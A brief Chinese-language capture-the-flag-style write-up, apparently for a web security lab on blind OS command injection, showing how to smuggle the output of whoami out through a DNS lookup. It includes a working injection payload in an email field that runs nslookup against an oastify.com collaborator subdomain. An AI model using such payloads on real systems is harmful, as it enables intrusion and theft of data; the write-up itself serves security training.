# OS command injection Lab5
這題上一題的進階版,不只要觸發命令,還要把 whoami 的輸出結果偷渡出來。
先進入網站然後攔截請求。


本提要發送 DNS,所以我們先去拿我們的子網域。
```
6597gkxmsqylh4qyxj7juuspdgj77zvo.oastify.com
```
接著回來我們攔截的請求中,加上我們剛剛複製的子網域。

```
email=||nslookup+`whoami`.6597gkxmsqylh4qyxj7juuspdgj77zvo.oastify.com||
```
:::info
### 為什麼用 nslookup?
因為 nslookup(或 ping)會觸發一個 DNS 查詢,是最常見、最穩定的 OAST 利用方式,即便伺服器不允許回傳任何資料,我們也能偵測這個「外部互動」。
:::
現在去看看我們的 DNS。

將剛剛得到的資訊送去給 Lab 中的答案框。


---